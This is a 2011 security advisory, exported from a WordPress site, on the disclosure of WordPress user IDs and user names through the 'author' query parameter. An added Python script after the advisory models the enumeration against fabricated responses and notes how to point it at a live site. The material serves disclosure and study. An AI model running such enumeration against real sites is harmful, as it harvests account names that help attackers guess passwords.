
{"id":1388,"date":"2011-05-26T09:35:27","date_gmt":"2011-05-26T12:35:27","guid":{"rendered":"http:\/\/www.talsoft.com.ar\/?p=1388"},"modified":"2011-05-26T09:35:27","modified_gmt":"2011-05-26T12:35:27","slug":"talsoft-advisory-security-wordpress-user-id-and-user-name-disclosure","status":"publish","type":"post","link":"https:\/\/www.talsoft-security.com\/site\/talsoft-advisory-security-wordpress-user-id-and-user-name-disclosure\/","title":{"rendered":"Talsoft Advisory Security &#8211; WordPress User ID and User Name Disclosure"},"content":{"rendered":"<h3>I. Advisory information<\/h3>\n<p>Title: WordPress User IDs and User Names Disclosure<br \/>\nAdvisory Id: TALSOFT-2011-0526<br \/>\nAdvisory URL: <a title=\"http:\/\/www.talsoft.com.ar\/index.php\/research\/security-advisories\/wordpress-user-id-and-user-name-disclosure\" href=\"..\/..\/index.php\/research\/security-advisories\/wordpress-user-id-and-user-name-disclosure\">http:\/\/www.talsoft.com.ar\/index.php\/research\/security-advisories\/wordpress-user-id-and-user-name-disclosure<\/a><br \/>\nDate published: 2011-05-26<br \/>\nVendors contacted: WordPress<br \/>\nAuthor: Ver\u00f3nica Valeros<\/p>\n<h3>II. Vulnerability information<\/h3>\n<p>Class: Insecure Direct Object References (CWE-715)<br \/>\nImpact: Low<br \/>\nRemotely Exploitable: Yes<br \/>\nLocally Exploitable: Yes<\/p>\n<h3>III. Overview<\/h3>\n<p>WordPress sites accept a query-string parameter called \u2018author\u2019. This parameter takes an integer value and represents the \u2018User ID\u2019 of a user registered on the site. 
For example: http:\/\/www.example.com\/?author=1<br \/>\nThe problems found are:<\/p>\n<ol>\n<li>User ID values are assigned consecutively.<\/li>\n<li>When the User ID is valid, WordPress redirects to the author archive page, whose URL contains the author's user name.<\/li>\n<\/ol>\n<p>These problems enable the following attack vectors:<\/p>\n<ol>\n<li>The response to the query discloses whether the User ID belongs to an existing account.<\/li>\n<li>The response to the query leaks (through the redirection) the User Name corresponding to that User ID. (See the update below for version 3.1.3.)<\/li>\n<\/ol>\n<p>User accounts can be deleted, leaving gaps in the consecutive numbering. When an invalid User ID is sent, no redirection takes place and no information is disclosed, so valid and invalid IDs can be told apart from the response alone.<\/p>\n<p>The attack can be automated by sending one query per consecutive ID, extracting the valid User IDs and their User Names from a vulnerable site.<\/p>\n<p><em>Update:<\/em><\/p>\n<p>In version 3.1.3 the redirection described in the second attack vector no longer takes place, but the User Name can still be found in the HTML source of the returned page. This version is therefore still vulnerable.<\/p>\n<h3>IV. Affected versions<\/h3>\n<p>This issue was tested in versions 2.6, 3.1, 3.1.1, 3.1.3 and 3.2-beta2. Other versions were not tested and may be vulnerable.<\/p>\n<h3>V. Non-affected versions<\/h3>\n<p>Unknown.<\/p>\n<h3>VI. Proof of concept<\/h3>\n<p>A Proof of Concept (PoC) is available at: <a title=\"wp-userdata-disclosure-PoC.py.tar.gz\" href=\"..\/wp-content\/uploads\/2011\/05\/wp-userdata-disclosure-PoC.py_.tar.gz\">wp-userdata-disclosure-PoC.py.tar.gz<\/a><\/p>\n<h3>VII. Solution<\/h3>\n<p>WordPress version 3.1.3 fixes the redirection problem, but user names are still disclosed in the HTML source of the page. No fix was provided for this second problem.<\/p>\n<h3>VIII. 
Disclosure timeline<\/h3>\n<ul>\n<li>2011-03-14:\n<ul>\n<li>Vulnerability was identified.<\/li>\n<\/ul>\n<\/li>\n<li>2011-05-11:\n<ul>\n<li>WordPress security team was contacted.<\/li>\n<\/ul>\n<\/li>\n<li>2011-05-12:\n<ul>\n<li>WordPress confirmed the vulnerability.<\/li>\n<\/ul>\n<\/li>\n<li>2011-05-25:\n<ul>\n<li>WordPress released version 3.1.3, which included a fix for the canonical redirection problem but did not include a fix for the source code problem.<\/li>\n<li>The WordPress security team was informed that the vulnerability was still exploitable after the release of version 3.1.3.<\/li>\n<li>The WordPress team agreed to the release of this security advisory.<\/li>\n<\/ul>\n<\/li>\n<li>2011-05-26:\n<ul>\n<li>The advisory was released.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h3>IX. Credits<\/h3>\n<p>This vulnerability was discovered and reported by Ver\u00f3nica Valeros (veronicavaleros at talsoft.com.ar).<\/p>\n<h3>X. Disclaimer<\/h3>\n<p>The information provided in this document is for information purposes only. Talsoft S.R.L. accepts no responsibility for any damage caused by the use or misuse of this information. The content of this advisory may be distributed freely, provided that no fee is charged for this distribution and proper credit is given.<\/p>\n<h3>XI. About Talsoft S.R.L.<\/h3>\n<p>Talsoft S.R.L. is a growing company with the mission to provide solutions in the following areas:<\/p>\n<ul>\n<li>Information Security<\/li>\n<li>Technology administration<\/li>\n<li>Open source solutions<\/li>\n<li>Training and courses<\/li>\n<\/ul>\n<p>Talsoft S.R.L. is also involved in many information security research projects.<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[1],"tags":[],"class_list":["post-1388","post","type-post","status-publish","format-standard","hentry","category-profesional"]}
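The enumeration described in sections III and VII of the advisory, modelled offline as an added example (this is not the advisory's PoC script and not WordPress code): `probe` classifies one `?author=N` response using the pre-3.1.3 canonical redirect to `/author/<name>/` and, failing that, the 3.1.3 page-source leak, and `enumerate_authors` walks consecutive IDs while tolerating the gaps left by deleted accounts. The status codes, the `Location` path, the `author-<name>` body class and feed link used to recognise the leak, and all sample responses are constructed assumptions for illustration, not values taken from the advisory.

```python
"""Offline model of the user-ID / user-name enumeration described in
TALSOFT-2011-0526. Added example: not the advisory's PoC and not WordPress
code. Every response below is constructed for illustration."""
import re
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional, Tuple
from urllib.parse import urlparse


@dataclass
class Response:
    """Minimal stand-in for an HTTP response to GET /?author=N."""
    status: int
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


# Assumed markup for the 3.1.3 leak: the author slug survives in the author
# archive URL (e.g. a feed link) and in the body class of the archive page.
AUTHOR_PATH_RE = re.compile(r"/author/([a-z0-9_.-]+)/?", re.I)
BODY_CLASS_RE = re.compile(r'<body[^>]*class="[^"]*\bauthor-([a-z0-9_-]+)', re.I)


def username_from_redirect(resp: Response) -> Optional[str]:
    """Pre-3.1.3 vector: the canonical redirect names the author in Location."""
    if resp.status not in (301, 302):
        return None
    location = resp.headers.get("Location", "")
    m = AUTHOR_PATH_RE.search(urlparse(location).path)
    return m.group(1) if m else None


def username_from_source(resp: Response) -> Optional[str]:
    """3.1.3 vector: no redirect, but the name is still in the HTML source."""
    if resp.status != 200:
        return None
    for pattern in (BODY_CLASS_RE, AUTHOR_PATH_RE):
        m = pattern.search(resp.body)
        if m:
            return m.group(1)
    return None


def probe(resp: Response) -> Tuple[bool, Optional[str]]:
    """Classify one response as (id_is_valid, leaked_user_name)."""
    name = username_from_redirect(resp) or username_from_source(resp)
    if name:
        return True, name
    # Vector 1 alone: a valid ID answers 200 (or redirects) while an unknown
    # ID is assumed to answer 404, so existence leaks even without a name.
    return resp.status in (200, 301, 302), None


def enumerate_authors(fetch: Callable[[int], Response], start: int = 1,
                      stop: int = 50, max_gap: int = 3) -> Dict[int, Optional[str]]:
    """Walk consecutive IDs; deleted accounts leave gaps, so only stop after
    max_gap consecutive invalid IDs rather than at the first miss."""
    found: Dict[int, Optional[str]] = {}
    gap = 0
    for uid in range(start, stop + 1):
        valid, name = probe(fetch(uid))
        if valid:
            found[uid] = name
            gap = 0
        else:
            gap += 1
            if gap >= max_gap:
                break
    return found


# Constructed fixture standing in for a target site (not real responses).
SAMPLE_RESPONSES: Dict[int, Response] = {
    1: Response(301, {"Location": "http://www.example.com/author/admin/"}),
    2: Response(200, body='<html><body class="archive author author-editor">'
                          '<h1>Posts by editor</h1></body></html>'),
    # ID 3 is absent: a deleted account, i.e. a gap in the numbering.
    4: Response(200, body='<html><head><link rel="alternate" '
                          'href="http://www.example.com/author/jane/feed/"></head>'
                          '<body class="archive"></body></html>'),
    5: Response(200, body="<html><body><h1>Archive</h1></body></html>"),
}


def sample_fetch(uid: int) -> Response:
    """Fetcher over the fixture; unknown IDs get the assumed 404."""
    return SAMPLE_RESPONSES.get(uid, Response(404, body="<html>Not Found</html>"))


if __name__ == "__main__":
    for uid, name in enumerate_authors(sample_fetch).items():
        print(f"author={uid}: valid, user name {name or 'not leaked'}")
```

Against a live site `sample_fetch` would be replaced by a function that issues the request without following redirects; a client that follows them silently consumes the `Location` header and leaves only the page-source path. The `max_gap` tolerance is what keeps a single deleted account from ending the scan early, which is the point the advisory makes about holes in the consecutive numbering.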